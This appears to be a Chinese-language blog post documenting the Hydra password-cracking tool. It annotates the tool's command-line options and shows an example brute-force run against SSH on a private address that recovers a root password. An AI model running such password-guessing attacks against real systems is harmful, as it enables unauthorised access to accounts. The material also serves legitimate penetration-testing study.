hydra
Syntax:
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] |
[-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]]
[-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET]
[-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
-R restore a previous aborted/crashed session
# 恢复之前的中止/崩溃的任务
-I ignore an existing restore file (do not wait 10 seconds)
# 忽略现有的还原文件(不要等待十秒)
-S perform an SSL connect
# 执行SSL连接
-s PORT if the service is on a different default port, define it here
# -s 端口 如果这个服务与默认端口不同, 在这定义
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
# -l 登陆 -L 文件 登陆用户名, 或者在文件中加载一些用户名
-p PASS or -P FILE try password PASS, or load several passwords from FILE
# -p 密码 -P 文件 尝试密码通过, 或从文件中加载一些密码尝试
-x MIN:MAX:CHARSET password brute force generation, type "-x -h" to get help
# 最小:最大:字符集 生成暴力密码, 可以输入"-x -h"获得帮助
-y disable use of symbols in brute force, see above
# 禁止在暴力密码中使用符号, 参见上文"-x"
-r use a non-random shuffling method for option -x
# 在-x 选项中使用不随机洗牌方法
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
# 尝试"n"空密码, "s" 作为通行证登陆 并且/或 "r" 反向登陆 --没理解
-u loop around users, not passwords (effective! implied with -x)
# 循环使用用户, 不是用密码(有效的! -x中有说明?)
-C FILE colon separated "login:pass" format, instead of -L/-P options
# -C 文件 冒号分离"用户名:密码"格式, 代替-L/-P选项
-M FILE list of servers to attack, one entry per line, ':' to specify port
# -M 文件 去攻击的服务器列表, 按行执行, ':'去指定特殊端口
-o FILE write found login/password pairs to FILE instead of stdout
# -o 文件 将找到的登录/密码对写入文件,而不是标准输出
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
# -b FORMAT format(版式) 指定-o文件格式: 文本(默认), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
# 当登陆/密码对已经找到就退出(-M: -f 每一个主机, -F 全部)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
# 任务运行任务每个目标并行连接的数量
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
# 任务运行任务连接总体并行(使用-M, 默认:64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
# 等待回应时间(32)/ 在每个进程连接之间
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-K do not redo failed attempts (good for -M mass scanning)
-q do not print messages about connection errors
-U service module usage details
-m OPT options specific for a module, see -U output for information
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
示例:
hydra -[l root / L /用户名路径] -P /字典路径 -t [1-64线程] [协议]://192.168.1.1
举例:
hydra -l root -P /home/zyx/password.txt -t 64 ssh://192.168.1.114
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-11 09:06:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 147253 login tries (l:1/p:147253), ~2301 tries per task
[DATA] attacking ssh://192.168.1.114:22/
[22][ssh] host: 192.168.1.114 login: root password: passwd
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 52 final worker threads did not complete until end.
[ERROR] 52 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-11 09:06:59
南涧之滨
评论前必须登录!
注册